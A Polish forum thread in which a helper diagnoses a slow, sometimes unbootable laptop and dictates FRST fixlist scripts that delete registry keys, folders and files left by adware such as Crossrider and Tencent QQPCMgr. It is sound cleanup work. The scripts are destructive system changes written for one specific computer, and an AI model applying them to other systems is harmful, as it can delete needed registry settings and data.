Temat przenoszę do działu Windows, pod zmienionym bardziej dopasowanym do problemu tytułem. Brak oznak czynnej infekcji. Nie, nie ma "trojana COM Surrogate". Samo hasło "COM Surrogate" jest zaś nazwą systemowego procesu dllhost.exe:

Użytkownicy "połączyli" tę nazwę z infekcją ze względu na efekty jakie infekcja produkowała (rozmnożenie instancji procesu dllhost.exe). U Ciebie na pewno nie ma tej infekcji. Skąd tu w ogóle pomysł, że taka infekcja miałaby być? Skoro wspominasz nazwę "COM Surrogate", to czy to oznacza, że widzisz jakiś błąd z dllhost.exe?

Cytat

cos sie dzieje z moim komputerem zaczyna dzialac bardzo wolno czasem nawet sie nie wlacza

Z raportów nic nie wynika, a objawy może produkować mnóstwo czynników (od software aż po hardware). Rozwiń o co chodzi z "czasem nawet się nie włącza", opisz jak to dokładnie wygląda, na jakim ekranie zatrzymuje się uruchamianie. W zależności od tego jak ten defekt wygląda może się okazać, że problem jest np. sprzętowy.

Na razie nie za wiele jestem w stanie zrobić. Sugestie:

1. Odinstaluj zbędne zintegrowane programy ASUS AsusVibe2.0, WebStorage, co zredukuje ilość uruchamianych procesów. WebStorage zresztą znany z generowana błędów w eksploratorze Windows.

2. Wyłącz crack Office i aktualizatory ASUS w Harmonogramie zadań. Uruchom Autoruns i w karcie Scheduled Tasks odznacz te pozycje:

Task: {4167E53F-2364-436F-B7E5-E68052344202} - System32\Tasks\IORRT => C:\IORRT\IORRT.bat [2014-11-11] ()
Task: {43AD02B5-464D-4394-A4F4-5F28253F431A} - System32\Tasks\Hybrid => C:\IORRT\IORRT.bat [2014-11-11] ()
Task: {CD950988-52E6-44EF-9B53-2914411E6768} - System32\Tasks\ASUS Live Update2 => C:\Program Files (x86) [2015-07-13] ()
Task: {E7E663E0-6CE0-40DA-8DB1-2C91B5BC1369} - System32\Tasks\ASUS Live Update1 => C:\Program Files (x86) [2015-07-13] ()

Po tym zresetuj system.

PS. W spoilerze doczyszczanie mikro szczątków adware i wpisów pustych. To nie ma związku ze zgłaszanymi problemami i nie wpłynie na poprawę stanu systemu.

CloseProcesses:
CreateRestorePoint
ShortcutWithArgument: C:\Users\Ewela22\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://istart.webssearches.com/?type=sc&ts=1420384302&from=irs&uid=ST500LT012-1DG142_S3P5XW27XXXXS3P5XW27
S2 51cdb72; "C:\Windows\system32\rundll32.exe" "c:\Program Files (x86)\Optimizer Pro 3.11\OptProCrash.dll",ENT
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mcpltsvc => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcpltsvc => ""=""
Task: {47D482F0-2BDA-4A08-9707-A3C0F07D2B0D} - System32\Tasks\{094725F5-D527-4920-87FF-75624A521BC7} => pcalua.exe -a C:\Users\Ewela22\AppData\Roaming\webssearches\UninstallManager.exe -c -ptid=irs 
Task: {CBD519A7-6FB3-4EC4-8C97-6951E067506E} - System32\Tasks\{1A30784D-F977-44E4-ADC2-41DEE3C2263B} => Chrome.exe hxxp://ui.skype.com/ui/0/7.6.64.103/pl/abandoninstall?page=tsProgressBar
Task: {E47192EA-3D48-4171-9586-0A9F1A5B1A56} - System32\Tasks\{6A6B33AE-7155-485C-8316-B034B5D8ECC2} => pcalua.exe -a C:\Users\Ewela22\AppData\Roaming\Gameo\uninstall.exe
Task: {F759872B-9B8F-4E9C-A216-EF086BD5926E} - \GPUP -> Brak pliku 
CustomCLSID: HKU\S-1-5-21-1587283898-3112464119-1393011846-1001_Classes\CLSID\{1423F872-3F7F-4E57-B621-8B1A9D49B448}\InprocServer32 -> C:\Users\Ewela22\AppData\Local\Google\Update\1.3.27.5\psuser_64.dll => Brak pliku
CustomCLSID: HKU\S-1-5-21-1587283898-3112464119-1393011846-1001_Classes\CLSID\{38216570-5DB1-45F8-A344-B0C4E252B14B}\InprocServer32 -> C:\Users\Ewela22\AppData\Local\Google\Update\1.3.26.7\psuser_64.dll => Brak pliku
CustomCLSID: HKU\S-1-5-21-1587283898-3112464119-1393011846-1001_Classes\CLSID\{5C8C2A98-6133-4EBA-BBCC-34D9EA01FC2E}\InprocServer32 -> C:\Users\Ewela22\AppData\Local\Google\Update\1.3.28.1\psuser_64.dll => Brak pliku
CustomCLSID: HKU\S-1-5-21-1587283898-3112464119-1393011846-1001_Classes\CLSID\{78550997-5DEF-4A8A-BAF9-D5774E87AC98}\InprocServer32 -> C:\Users\Ewela22\AppData\Local\Google\Update\1.3.28.13\psuser_64.dll => Brak pliku
CustomCLSID: HKU\S-1-5-21-1587283898-3112464119-1393011846-1001_Classes\CLSID\{D0336C0B-7919-4C04-8CCE-2EBAE2ECE8C9}\InprocServer32 -> C:\Users\Ewela22\AppData\Local\Google\Update\1.3.25.11\psuser_64.dll => Brak pliku
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => Brak pliku
CHR HKLM\SOFTWARE\Policies\Google: Ograniczenia 
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = www.google.com
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = www.google.com
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = www.google.com
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = www.google.com
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = www.google.com
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = www.google.com
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = www.google.com
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = www.google.com
StartMenuInternet: IEXPLORE.EXE - iexplore.exe
DeleteKey: HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{17812836}
Reg: reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run /v SpeedTray /f
CMD: type "C:\Windows\System32\Tasks\ASUS Live Update2"
CMD: type "C:\Windows\System32\Tasks\ASUS Live Update1"
RemoveProxy:
EmptyTemp:

Fix FRST jest jednorazowego użytku i nie wolno go powtarzać, nie przetworzy ponownie po raz drugi tego samego. Zadany został uruchomiony dwa razy i to co tu widzę to już drugie bezużyteczne podejście, log na dodatek urwany zaraz na początku. Poproszę o log z poprzedniego podejścia. Wejdź do katalogu C:\FRST\Logs, ułóż logi wg nazwy, wyszukaj pliki o modelu nazwy Fixlog_data_czas. Otwórz w Notatniku pliki i szukaj tego który ma w nagłówku:

Ran by Krzysztof (2015-10-30 19:44:44) Run:3

Ten plik jest tym o który mi chodzi.

W raportach nie widać żadnych jawnych oznak infekcji, z wyjątkiem tego że w GMER jest jakiś "podejrzany moduł" załadowany do explorer.exe, tylko nawet nie widać w jakiej ścieżce (bug z obcięciem ścieżki). Z tym że ten odczyt nie musi być związany z żadną infekcją.

Są tu zainstalowane trzy przeglądarki wtórne: Google Chrome, Firefox, Opera. Domyślną jest Firefox. W której przeglądarce występują przekierowania, a może we wszystkich?

Kolejna porcja usuwania. Otwórz Notatnik i wklej w nim:

DeleteKey: HKCU\Software\_CrossriderRegNamePlaceHolder_
DeleteKey: HKCU\Software\Crossrider
DeleteKey: HKCU\Software\DAILYPCCLEAN
DeleteKey: HKCU\Software\GlobalUpdate
DeleteKey: HKCU\Software\GoHD
DeleteKey: HKCU\Software\InstalledBrowserExtensions
DeleteKey: HKCU\Software\Mozilla\Extends
DeleteKey: HKCU\Software\OB
DeleteKey: HKCU\Software\PRODUCTSETUP
DeleteKey: HKCU\Software\Reg\Clean
DeleteKey: HKCU\Software\Tencent
DeleteKey: HKCU\Software\Tutorials
DeleteKey: HKCU\Software\TutoTag
DeleteKey: HKCU\Software\Yahoo\Companion
DeleteKey: HKCU\Software\Yahoo\YFriendsBar
DeleteKey: HKLM\SOFTWARE\76b8b9df-7995-40ea-95a1-f80de3274052
DeleteKey: HKLM\SOFTWARE\c66e83ef-420b-4913-9bf6-d3e0763c09b8
DeleteKey: HKLM\SOFTWARE\ebf2cd08-ec58-499d-be2a-c13dcc616e42
DeleteKey: HKLM\SOFTWARE\Classes\AppID\{3278F5CF-48F3-4253-A6BB-004CE84AF492}
DeleteKey: HKLM\SOFTWARE\Classes\AppID\{577975B8-C40E-43E6-B0DE-4C6B44088B52}
DeleteKey: HKLM\SOFTWARE\Classes\AppID\{51BEE30D-EEC8-4BA3-930B-298B8E759EB1}
DeleteKey: HKLM\SOFTWARE\Classes\AppID\DownloadProxy.EXE
DeleteKey: HKLM\SOFTWARE\Classes\AppID\globalupdate.exe
DeleteKey: HKLM\SOFTWARE\Classes\Applications\QMDeskTopGC.exe
DeleteKey: HKLM\SOFTWARE\Classes\CLSID\{29B6CFD5-0064-411A-8C42-9890C83F9921}
DeleteKey: HKLM\SOFTWARE\Classes\CLSID\{3278F5CF-48F3-4253-A6BB-004CE84AF492}
DeleteKey: HKLM\SOFTWARE\Classes\CLSID\{3B5702BA-7F4C-4D1A-B026-1E9A01D43978}
DeleteKey: HKLM\SOFTWARE\Classes\CLSID\{459DD0F7-0D55-D3DC-67BC-E6BE37E9D762}
DeleteKey: HKLM\SOFTWARE\Classes\CLSID\{4C097DF1-0716-4FA1-84A9-025BC1E7B03F}
DeleteKey: HKLM\SOFTWARE\Classes\CLSID\{5645E0E7-FC12-43BF-A6E4-F9751942B298}
DeleteKey: HKLM\SOFTWARE\Classes\CLSID\{577975B8-C40E-43E6-B0DE-4C6B44088B52}
DeleteKey: HKLM\SOFTWARE\Classes\CLSID\{5E89ACE9-E16B-499A-87B4-0DBF742404C1}
DeleteKey: HKLM\SOFTWARE\Classes\CLSID\{69F256DF-BA98-45E9-86EA-FC3CFECF9D30}
DeleteKey: HKLM\SOFTWARE\Classes\CLSID\{6E87FC94-9866-49B9-8E93-5736D6DE3DD7}
DeleteKey: HKLM\SOFTWARE\Classes\CLSID\{6EDBF8C0-C94C-4A13-956F-E393BCA5BA4B}
DeleteKey: HKLM\SOFTWARE\Classes\CLSID\{70DE12EA-79F4-46BC-9812-86DB50A2FD64}
DeleteKey: HKLM\SOFTWARE\Classes\CLSID\{7E49F793-B3CD-4BF7-8419-B34B8BD30E61}
DeleteKey: HKLM\SOFTWARE\Classes\CLSID\{834469E3-CA2B-4F21-A5CA-4F6F4DBCDE87}
DeleteKey: HKLM\SOFTWARE\Classes\CLSID\{8529FAA3-5BFD-43C1-AB35-B53C4B96C6E5}
DeleteKey: HKLM\SOFTWARE\Classes\CLSID\{88260EA6-BC91-42DF-ABEF-4A683E8A3C23}
DeleteKey: HKLM\SOFTWARE\Classes\CLSID\{ADBC39BE-3D20-4333-8D99-E91EB1B62474}
DeleteKey: HKLM\SOFTWARE\Classes\CLSID\{C7BF8F4B-7BC7-4F42-B944-3D28A3A86D8A}
DeleteKey: HKLM\SOFTWARE\Classes\CLSID\{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}
DeleteKey: HKLM\SOFTWARE\Classes\CLSID\{D4801E96-E7A1-45F6-B124-7A36DFB40B81}
DeleteKey: HKLM\SOFTWARE\Classes\CLSID\{E06CA7F5-BA34-4FF6-8D24-B1BDC594D91F}
DeleteKey: HKLM\SOFTWARE\Classes\CLSID\{E0ADB535-D7B5-4D8B-B15D-578BDD20D76A}
DeleteKey: HKLM\SOFTWARE\Classes\CLSID\{F6421EE5-A5BE-4D31-81D5-C16B7BF48E4C}
DeleteKey: HKLM\SOFTWARE\Classes\CLSID\{FD8E81D0-F5FE-4CB1-9AEA-1E163D2BAB78}
DeleteKey: HKLM\SOFTWARE\Classes\CLSID\{F83D1872-D9FF-47F8-B5A0-49CC51E24EE8}
DeleteKey: HKLM\SOFTWARE\Classes\Interface\{023E9EC8-B147-40EB-B0B3-DF90618FB371}
DeleteKey: HKLM\SOFTWARE\Classes\Interface\{0522D9A4-4D57-437D-978D-E5B3B6C9005D}
DeleteKey: HKLM\SOFTWARE\Classes\Interface\{07F41522-AF7D-4F26-B394-094F059FDB8A}
DeleteKey: HKLM\SOFTWARE\Classes\Interface\{0C40F472-7407-4467-8914-1DEA7C326972}
DeleteKey: HKLM\SOFTWARE\Classes\Interface\{212E6D43-6062-492A-B8CC-144669FF11ED}
DeleteKey: HKLM\SOFTWARE\Classes\Interface\{224FE662-1E6D-4BC0-AEBB-9E2FB4057BE9}
DeleteKey: HKLM\SOFTWARE\Classes\Interface\{3A807417-B46D-4D37-8C9A-19AC6DE204F9}
DeleteKey: HKLM\SOFTWARE\Classes\Interface\{3CC60715-D6C5-429D-830E-43FA3F86C61D}
DeleteKey: HKLM\SOFTWARE\Classes\Interface\{4517D94C-19BA-46FA-BE66-2A30CEAC4A85}
DeleteKey: HKLM\SOFTWARE\Classes\Interface\{555D7146-94A8-4C94-AE76-C39CDC7F7705}
DeleteKey: HKLM\SOFTWARE\Classes\Interface\{59D188FA-757A-424E-8C93-F58FFD896BD7}
DeleteKey: HKLM\SOFTWARE\Classes\Interface\{8120D9D6-785C-4413-9C0C-DF2028C56FAD}
DeleteKey: HKLM\SOFTWARE\Classes\Interface\{823AE2EB-E62C-4847-B192-C99B91B92416}
DeleteKey: HKLM\SOFTWARE\Classes\Interface\{9B4F7CFE-987D-410E-A8E4-20182E0B3C24}
DeleteKey: HKLM\SOFTWARE\Classes\Interface\{9B9A45F4-18FC-484A-BACA-076D78273D8E}
DeleteKey: HKLM\SOFTWARE\Classes\Interface\{A6D54287-7939-466A-8579-92546D946C8C}
DeleteKey: HKLM\SOFTWARE\Classes\Interface\{A78EDAFB-926F-4D93-AB13-8232D7378EB1}
DeleteKey: HKLM\SOFTWARE\Classes\Interface\{A8F7D0A5-7074-40B8-9BDC-1174BDD0A132}
DeleteKey: HKLM\SOFTWARE\Classes\Interface\{D14D64BC-A0E4-42E3-BB72-FB41EA43C198}
DeleteKey: HKLM\SOFTWARE\Classes\Interface\{DD1F043F-ABC8-4643-8B95-D2C5B22BB019}
DeleteKey: HKLM\SOFTWARE\Classes\Interface\{E3F3E8F9-F747-4DD6-BA6B-82A6CE1E0860}
DeleteKey: HKLM\SOFTWARE\Classes\Interface\{E7270EC6-0113-4A78-B610-E501D0A9E48E}
DeleteKey: HKLM\SOFTWARE\Classes\Interface\{ED0B64D4-BF27-4521-AD27-190F49BF5EA7}
DeleteKey: HKLM\SOFTWARE\Classes\TypeLib\{445E3964-15B0-472A-95F4-6242DD2EA066}
DeleteKey: HKLM\SOFTWARE\Classes\TypeLib\{8519F1E4-E25B-42B1-B361-0C643F45CF11}
DeleteKey: HKLM\SOFTWARE\Classes\TypeLib\{C049F583-D724-4BAB-8F47-F13BCA41B808}
DeleteKey: HKLM\SOFTWARE\Classes\TypeLib\{DA624F8F-98BF-4B03-AD11-A12D07119E81}
DeleteKey: HKLM\SOFTWARE\Classes\.qbox
DeleteKey: HKLM\SOFTWARE\Classes\globalUpdate.OneClickCtrl.10
DeleteKey: HKLM\SOFTWARE\Classes\globalUpdate.OneClickProcessLauncherMachine
DeleteKey: HKLM\SOFTWARE\Classes\globalUpdate.OneClickProcessLauncherMachine.1.0
DeleteKey: HKLM\SOFTWARE\Classes\globalUpdate.Update3WebControl.4
DeleteKey: HKLM\SOFTWARE\Classes\globalUpdateUpdate.CoCreateAsync
DeleteKey: HKLM\SOFTWARE\Classes\globalUpdateUpdate.CoCreateAsync.1.0
DeleteKey: HKLM\SOFTWARE\Classes\globalUpdateUpdate.CoreClass
DeleteKey: HKLM\SOFTWARE\Classes\globalUpdateUpdate.CoreClass.1
DeleteKey: HKLM\SOFTWARE\Classes\globalUpdateUpdate.CoreMachineClass
DeleteKey: HKLM\SOFTWARE\Classes\globalUpdateUpdate.CoreMachineClass.1
DeleteKey: HKLM\SOFTWARE\Classes\globalUpdateUpdate.CredentialDialogMachine
DeleteKey: HKLM\SOFTWARE\Classes\globalUpdateUpdate.CredentialDialogMachine.1.0
DeleteKey: HKLM\SOFTWARE\Classes\globalUpdateUpdate.OnDemandCOMClassMachine
DeleteKey: HKLM\SOFTWARE\Classes\globalUpdateUpdate.OnDemandCOMClassMachine.1.0
DeleteKey: HKLM\SOFTWARE\Classes\globalUpdateUpdate.OnDemandCOMClassMachineFallback
DeleteKey: HKLM\SOFTWARE\Classes\globalUpdateUpdate.OnDemandCOMClassMachineFallback.1.0
DeleteKey: HKLM\SOFTWARE\Classes\globalUpdateUpdate.OnDemandCOMClassSvc
DeleteKey: HKLM\SOFTWARE\Classes\globalUpdateUpdate.OnDemandCOMClassSvc.1.0
DeleteKey: HKLM\SOFTWARE\Classes\globalUpdateUpdate.ProcessLauncher
DeleteKey: HKLM\SOFTWARE\Classes\globalUpdateUpdate.ProcessLauncher.1.0
DeleteKey: HKLM\SOFTWARE\Classes\globalUpdateUpdate.Update3COMClassService
DeleteKey: HKLM\SOFTWARE\Classes\globalUpdateUpdate.Update3COMClassService.1.0
DeleteKey: HKLM\SOFTWARE\Classes\globalUpdateUpdate.Update3WebMachine
DeleteKey: HKLM\SOFTWARE\Classes\globalUpdateUpdate.Update3WebMachine.1.0
DeleteKey: HKLM\SOFTWARE\Classes\globalUpdateUpdate.Update3WebMachineFallback
DeleteKey: HKLM\SOFTWARE\Classes\globalUpdateUpdate.Update3WebMachineFallback.1.0
DeleteKey: HKLM\SOFTWARE\Classes\globalUpdateUpdate.Update3WebSvc
DeleteKey: HKLM\SOFTWARE\Classes\globalUpdateUpdate.Update3WebSvc.1.0
DeleteKey: HKLM\SOFTWARE\Classes\METNSD
DeleteKey: HKLM\SOFTWARE\Classes\PCMgrRepairIEExtensions
DeleteKey: HKLM\SOFTWARE\Classes\qmbfile
DeleteKey: HKLM\SOFTWARE\Classes\qmgcfiles
DeleteKey: HKLM\SOFTWARE\Classes\QQPCMgr.qbox
DeleteKey: HKLM\SOFTWARE\Classes\YBrowserToolbar.YBrowserToolbar.1
DeleteKey: HKLM\SOFTWARE\Classes\YBrowserToolbar.YBrowserToolbar
DeleteKey: HKLM\SOFTWARE\Microsoft\Esent\Process\crossbrowse
DeleteKey: HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{16EE6530-8649-4F42-A9E4-F6A3295AF975}
DeleteKey: HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{5645E0E7-FC12-43BF-A6E4-F9751942B298}
DeleteKey: HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{5E89ACE9-E16B-499A-87B4-0DBF742404C1}
DeleteKey: HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{C7BF8F4B-7BC7-4F42-B944-3D28A3A86D8A}
DeleteKey: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{5645E0E7-FC12-43BF-A6E4-F9751942B298}
DeleteKey: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{C7BF8F4B-7BC7-4F42-B944-3D28A3A86D8A}
DeleteKey: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{5645E0E7-FC12-43BF-A6E4-F9751942B298}
DeleteKey: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{C7BF8F4B-7BC7-4F42-B944-3D28A3A86D8A}
DeleteKey: HKLM\SOFTWARE\_CrossriderRegNamePlaceHolder_
DeleteKey: HKLM\SOFTWARE\downchecker
DeleteKey: HKLM\SOFTWARE\Crossrider
DeleteKey: HKLM\SOFTWARE\FFPluginHp
DeleteKey: HKLM\SOFTWARE\GlobalUpdate
DeleteKey: HKLM\SOFTWARE\GoHD
DeleteKey: HKLM\SOFTWARE\Google\Chrome\NativeMessagingHosts\com.qq.qmchext
DeleteKey: HKLM\SOFTWARE\InstalledBrowserExtensions
DeleteKey: HKLM\SOFTWARE\ihpmserver
DeleteKey: HKLM\SOFTWARE\RayDld
DeleteKey: HKLM\SOFTWARE\Reg\Clean
DeleteKey: HKLM\SOFTWARE\SavePass 1.1
DeleteKey: HKLM\SOFTWARE\sweet-pageSoftware
DeleteKey: HKLM\SOFTWARE\Tencent
DeleteKey: HKLM\SOFTWARE\Tutorials
DeleteKey: HKLM\SOFTWARE\Yahoo\Companion
DeleteKey: HKLM\SOFTWARE\WdsManPro
DeleteKey: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Management\ARPCache\SavePass 1.1
DeleteKey: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Management\ARPCache\GoHD
DeleteKey: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\GLOBALUPDATE.EXE
DeleteKey: HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_QMIEPROTECT
DeleteKey: HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_QQPCRTP
DeleteKey: HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_TAOACCELERATOR
DeleteKey: HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_TSFLTMGR
DeleteKey: HKLM\SYSTEM\CurrentControlSet\Services\Eventlog\Application\WdsManPro
DeleteKey: HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_QMUDISK
DeleteKey: HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_QQPCRTP
DeleteKey: HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_TAOACCELERATOR
DeleteKey: HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_TSFLTMGR
DeleteKey: HKLM\SYSTEM\ControlSet003\Enum\Root\LEGACY_QMUDISK
DeleteKey: HKLM\SYSTEM\ControlSet003\Enum\Root\LEGACY_QQPCRTP
DeleteKey: HKLM\SYSTEM\ControlSet003\Enum\Root\LEGACY_TAOACCELERATOR
DeleteKey: HKLM\SYSTEM\ControlSet003\Enum\Root\LEGACY_TSFLTMGR
DeleteKey: HKLM\SYSTEM\WifiSafeCfg
DeleteKey: HKU\S-1-5-18\Software\Tencent
DeleteKey: HKU\S-1-5-18\Software\Yahoo\Companion
RemoveDirectory: C:\AdwCleaner
RemoveDirectory: C:\Documents and Settings\All Users\Documents\ShopperPro
RemoveDirectory: C:\Documents and Settings\Administrator\Application Data\Mozilla
RemoveDirectory: C:\Documents and Settings\Gość\Application Data\Mozilla
RemoveDirectory: C:\Documents and Settings\Krzysztof\Application Data\Mozilla\Firefox\Profiles\12h1ceb6.default-1404211074967
RemoveDirectory: C:\FRST\Quarantine
Reg: reg add HKLM\SOFTWARE\Classes\Unknown\shell\openas\command /ve /t REG_EXPAND_SZ /d "%SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\shell32.dll,OpenAs_RunDLL %1" /f
Reg: reg delete "HKLM\SOFTWARE\Microsoft\Internet Explorer\AboutURls" /v Tab /f
Reg: reg delete HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache /v "C:\Program Files\Tencent\QQPCMgr\10.10.16434.218\\QMDeskTopGC.exe" /f
Reg: reg delete HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache /v "C:\Program Files\Tencent\QQPCMgr\10.10.16434.218\Uninst.exe" /f
CMD: del /q "C:\Documents and Settings\Krzysztof\Desktop\Mozilla Firefox.lnk"
CMD: del /q C:\WINDOWS\system32\roboot.exe
EmptyTemp:

Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Napraw (Fix). Nastąpi restart. Powstanie kolejny fixlog.txt. Przedstaw go.

DelFix wykonał co należy, usuń z dysku plik C:\delfix.txt. To tyle z zakresu czyszczenia systemu.

A czego może być to przyczyna tego czarnego ekranu przed zalogowaniem się do systemu. Już raz próbowałem tej metody ale to było przed wgraniem Avast + MBAM, czy spróbować zastosować się jeszcze raz do tej procedury.

Skoro już wykonywałeś tę optymalizację i nie miała ona skutków, to nie ma po co jej powtarzać. Dłuższy przestój w fazie logo Windows sugeruje długie ładowanie któregoś ze sterowników. Obecnie w Twoim systemie widać tylko sterowniki sprzętowe oraz doinstalowanych wtórnie aplikacji Avast i MBAM. Pytaniem jest czy pomiędzy deinstalacją ESET a instalacją Avast była jakaś poprawa?

Ten MBAM jest tak w ogóle potrzeby wraz z unchecky?

To są uzupełniające antywirusa programy, nie są aż takie "niezbędne". Rola Unchecky jest zresztą dość ograniczona do prewencji przed tymi działaniami: KLIK.

Nie odpowiedziałaś na pytanie:

Czy masz jakiś szczególny powód, by podejrzewać niedozwolone ingerencje?

1. Jeśli chodzi o instrukcje, to nie wszystko zostało zrobione. W punkcie 1 ominięta deinstalacja starej wersji Java. Nie ma też oznak wykonania resetu Firefox zadanego w punkcie 3 i nadal widać w Firefox adware. Oba zadania do wykonania.

2. Następnie uruchom AdwCleaner. Wybierz opcję Skanuj i dostarcz wynikowy log z folderu C:\AdwCleaner.

Prawie wszystko zrobione, z wyjątkiem trzech kluczy, których FRST nie umiał zaadresować. Teraz poprawki, w tym usuwanie folderów po różnych odinstalowanych aplikacjach. Kolejna porcja zadań:

1. Otwórz Notatnik i wklej w nim:

ShellIconOverlayIdentifiers: [GGDriveOverlay1] -> {E68D0A50-3C40-4712-B90D-DCFA93FF2534} => C:\Documents and Settings\All Users\Application Data\GG\ggdrive\ggdrive-overlay.dll [2012-06-05] (GG Network S.A.)
ShellIconOverlayIdentifiers: [GGDriveOverlay2] -> {E68D0A51-3C40-4712-B90D-DCFA93FF2534} => C:\Documents and Settings\All Users\Application Data\GG\ggdrive\ggdrive-overlay.dll [2012-06-05] (GG Network S.A.)
ShellIconOverlayIdentifiers: [GGDriveOverlay3] -> {E68D0A52-3C40-4712-B90D-DCFA93FF2534} => C:\Documents and Settings\All Users\Application Data\GG\ggdrive\ggdrive-overlay.dll [2012-06-05] (GG Network S.A.)
ShellIconOverlayIdentifiers: [GGDriveOverlay4] -> {E68D0A53-3C40-4712-B90D-DCFA93FF2534} => C:\Documents and Settings\All Users\Application Data\GG\ggdrive\ggdrive-overlay.dll [2012-06-05] (GG Network S.A.)
FF Plugin: @oberon-media.com/ONCAdapter -> C:\Program Files\Common Files\Oberon Media\NCAdapter\1.0.0.8\npapicomadapter.dll [2011-05-24] (Oberon-Media )
FF Plugin HKU\S-1-5-21-1960408961-682003330-839522115-1004: @Skype Limited.com/Facebook Video Calling Plugin -> C:\Documents and Settings\Krzysztof\Local Settings\Application Data\Facebook\Video\Skype\npFacebookVideoCalling.dll [No File]
DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} hxxp://java.sun.com/update/1.7.0/jinstall-1_7_0_55-windows-i586.cab
DPF: {CAFEEFAC-0017-0000-0055-ABCDEFFEDCBA} hxxp://java.sun.com/update/1.7.0/jinstall-1_7_0_55-windows-i586.cab
DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} hxxp://java.sun.com/update/1.7.0/jinstall-1_7_0_55-windows-i586.cab
Reg: reg add HKLM\SOFTWARE\Clients\StartMenuInternet\chrome.exe\shell\open\command /ve /t REG_SZ /d "\"C:\Program Files\Google\Chrome\Application\chrome.exe"" /f
Reg: reg delete "HKLM\SOFTWARE\Clients\StartMenuInternet\Google Chrome" /f
Reg: reg delete "HKU\S-1-5-19\Software\Microsoft\Internet Explorer\Main" /f
Reg: reg delete "HKU\S-1-5-19\Software\Microsoft\Internet Explorer\SearchScopes" /f
Reg: reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{D40F6104-6988-47C0-93F2-A66D5DA120A2} /s
CMD: regsvr32 /u /s "C:\Documents and Settings\All Users\Application Data\GG\ggdrive\ggdrive-overlay.dll"
C:\Documents and Settings\All Users\Application Data\{262E20B8-6E20-4CEF-B1FD-D022AB1085F5}.dat
C:\Documents and Settings\All Users\Application Data\Ament.ini
C:\Documents and Settings\All Users\Application Data\Microsoft.SqlServer.Compact.351.32.bc
C:\Documents and Settings\All Users\Application Data\{429CAD59-35B1-4DBC-BB6D-1DB246563521}
C:\Documents and Settings\All Users\Application Data\aliasworlds
C:\Documents and Settings\All Users\Application Data\Ashampoo
C:\Documents and Settings\All Users\Application Data\Autodesk
C:\Documents and Settings\All Users\Application Data\AVAST Software
C:\Documents and Settings\All Users\Application Data\Big Fish
C:\Documents and Settings\All Users\Application Data\Big Fish Games
C:\Documents and Settings\All Users\Application Data\BigFishCache
C:\Documents and Settings\All Users\Application Data\BigFishGamesCache
C:\Documents and Settings\All Users\Application Data\casualArts
C:\Documents and Settings\All Users\Application Data\Corel
C:\Documents and Settings\All Users\Application Data\CorelDRAW Graphics Suite X5
C:\Documents and Settings\All Users\Application Data\CorelDRAW Graphics Suite X6
C:\Documents and Settings\All Users\Application Data\DailyMagic
C:\Documents and Settings\All Users\Application Data\Devart
C:\Documents and Settings\All Users\Application Data\DWdsManProD
C:\Documents and Settings\All Users\Application Data\Elephant Games
C:\Documents and Settings\All Users\Application Data\FarmFrenzy3
C:\Documents and Settings\All Users\Application Data\FarmFrenzy_Vikings
C:\Documents and Settings\All Users\Application Data\firebird
C:\Documents and Settings\All Users\Application Data\FreeHideIP
C:\Documents and Settings\All Users\Application Data\Fugazo
C:\Documents and Settings\All Users\Application Data\Gadu-Gadu 10
C:\Documents and Settings\All Users\Application Data\GG
C:\Documents and Settings\All Users\Application Data\GoBit Games
C:\Documents and Settings\All Users\Application Data\Gogii
C:\Documents and Settings\All Users\Application Data\Komputerowa Gratka
C:\Documents and Settings\All Users\Application Data\Malwarebytes
C:\Documents and Settings\All Users\Application Data\Maximize Games
C:\Documents and Settings\All Users\Application Data\McAfee
